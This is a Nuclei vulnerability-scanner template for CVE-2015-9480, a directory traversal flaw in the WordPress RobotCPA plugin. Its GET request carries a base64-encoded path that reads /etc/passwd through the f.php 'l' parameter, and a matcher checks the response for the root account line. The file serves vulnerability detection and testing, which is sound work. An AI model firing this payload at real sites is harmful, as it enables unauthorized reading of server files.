my-nuclei-templates/CVE-2015-9480.yaml

34 lines
848 B
YAML

id: CVE-2015-9480
info:
name: WordPress RobotCPA 5 - Directory Traversal
author: daffainfo
severity: high
description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.
reference:
- https://www.exploit-db.com/exploits/37252
- https://nvd.nist.gov/vuln/detail/CVE-2015-9480
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-9480
cwe-id: CWE-22
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/04/20